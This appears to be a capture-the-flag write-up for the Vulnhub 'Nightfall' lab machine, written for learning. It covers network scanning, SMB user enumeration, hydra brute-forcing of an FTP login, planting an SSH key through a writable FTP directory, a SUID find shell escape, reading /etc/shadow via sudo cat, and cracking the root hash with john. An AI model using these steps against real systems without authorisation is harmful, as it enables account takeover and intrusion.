Vulnhub: Nightfall

This is a beginner-level machine part of the sunset series from vulnhub. I would definitely recommend it, it will expose you to some essential skills/concepts

Scanning:

Begin by finding the machine on the network:

crazyeights@es-base:~$ nmap -PS 192.168.0.1-255

Nmap scan report for 192.168.0.203
Host is up (0.00012s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql

Find more details about running services. Only other important detail found was the domain name nightfall

crazyeights@es-base:~$ sudo nmap -sCSV 192.168.0.203
[SNIP]

Web:

Nothing on the web server, just the default page.

SMB:

List available shares:

crazyeights@es-base:~$ smbclient -L \\nightfall -I 192.168.0.203 -N

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available

There are no available shares, using enum4linux to find users:

enum4linux 192.168.0.203
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)
  • we find two local users nightfall, and matt

  • Try to get the password for a user for another of the running services:

crazyeights@es-base:~$ hydra -l matt -P lists/rockyou-40.txt ftp://192.168.0.203
[SNIP]
[DATA] attacking ftp://192.168.0.203:21/
[21][ftp] host: 192.168.0.203   login: matt   password: cheese
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-05 17:48:17
crazyeights@es-base:~$ 

FTP:

Login as matt:

crazyeights@es-base:~$ ftp 192.168.0.203
Connected to 192.168.0.203.
220 pyftpdlib 1.5.5 ready.
Name (192.168.0.203:crazyeights): matt
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Look for available files:

ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-------   1 matt     matt            0 Aug 28  2019 .bash_history
-rw-r--r--   1 matt     matt          220 Aug 26  2019 .bash_logout
-rw-r--r--   1 matt     matt         3526 Aug 26  2019 .bashrc
drwx------   3 matt     matt         4096 Aug 28  2019 .gnupg
drwxr-xr-x   3 matt     matt         4096 Aug 26  2019 .local
-rw-r--r--   1 matt     matt          807 Aug 26  2019 .profile
-rw-------   1 matt     matt            0 Aug 28  2019 .sh_history
226 Transfer complete.
  • There is no interesting information in any of the files
  • The ftp servier is writable though

Create a folder .ssh to add our public key as an authorized key allowing for us to login via SSH:

ftp> mkdir .ssh
257 "/.ssh" directory created.
ftp> cd .ssh
250 "/.ssh" is the current directory.
ftp> dir
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp>
  • create a public-private key pair with ssh-keygen if you do not have one already
  • Copy your public key to file authorized keys:
crazyeights@es-base:~$ cp .ssh/id_rsa.pub authorized_keys

Upload the file authorized_keys to the folder .ssh on the ftp server:

ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
573 bytes sent in 0.01 secs (63.6961 kB/s)
ftp> 

User:

We can now login as matt via SSH:

crazyeights@es-base:~$ ssh matt@192.168.0.203
Linux nightfall 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64

matt@nightfall:~$ 

There are only two users on the machine matt and nightfall:

matt@nightfall:~$ ls /home
matt  nightfall

Find programs matt can run acting as a different user:

matt@nightfall:~$ find / -perm /4000 2>/dev/null
/scripts/find

The binary scripts/find seems promising:

matt@nightfall:/scripts$ ls
find

Testing running it we determine it is the same as normal find:

matt@nightfall:/scripts$ ./find / -name "index.html"

Like with normal find we can use the exec param to get a shell:

Getting the user flag:

matt@nightfall:/scripts$ ./find . -exec /bin/sh -p \; -quit
$ cd /home/nightfall
$ ls
user.txt
$ cat user.txt
97fb7140ca325ed96f67be3c9e30083d

Root:

To elevate our privileges to that of the user nightfall we can copy the authorized_keys we made earlier to nightfall/.ssh/authorized_keys allowing us to login to SSH as nightfall:

matt@nightfall:/scripts$ ./find . -exec /bin/sh -p \; -quit
$ id            
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
$ mkdir /home/nightfall/.ssh
$ cp /home/matt/.ssh/authorized_keys /home/nightfall/.ssh/authorized_keys
$ 

Logging in as nightfall:

crazyeights@es-base:~$ ssh nightfall@192.168.0.203
Linux nightfall 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64

Last login: Wed Aug 28 18:35:04 2019 from 192.168.1.182
nightfall@nightfall:~$ ls
user.txt

Find what programs the user nightfall can run with elevated privileges:

nightfall@nightfall:~$ sudo -l
Matching Defaults entries for nightfall on nightfall:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nightfall may run the following commands on nightfall:
    (root) NOPASSWD: /usr/bin/cat
  • The user nightfall can run cat as root, meaning we can read all files as root
  • Reading the shadow file to retrieve passwords:
nightfall@nightfall:/tmp$ sudo cat /etc/shadow
root:$6$JNHsN5GY.jc9CiTg$MjYL9NyNc4GcYS2zNO6PzQNHY2BE/YODBUuqsrpIlpS9LK3xQ6coZs6lonzURBJUDjCRegMHSF5JwCMG1az8k.:18134:0:99999:7:::

Copy the hash to a file and crack it using john:

crazyeights@es-base:~$ john --wordlist=lists/rockyou-40.txt -rules nightfall_root_pass 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
miguel2          (root)
1g 0:00:00:06 DONE (2021-01-05 20:07) 0.1587g/s 4876p/s 4876c/s 4876C/s IUBITA..mariajose2
Use the "--show" option to display all of the cracked passwords reliably
Session completed
crazyeights@es-base:~$ 

Login as root:

nightfall@nightfall:/tmp$ su root
Password: 

Retrieve the root flag:

root@nightfall:~# cat root_super_secret_flag.txt 
Congratulations! Please contact me via twitter and give me some feedback! @whitecr0w1
[SNIP]
Thank you for playing! - Felipe Winsnes (whitecr0wz)                                 

flag{9a5b21fc6719fe33004d66b703d70a39}

root@nightfall:~#

FIN.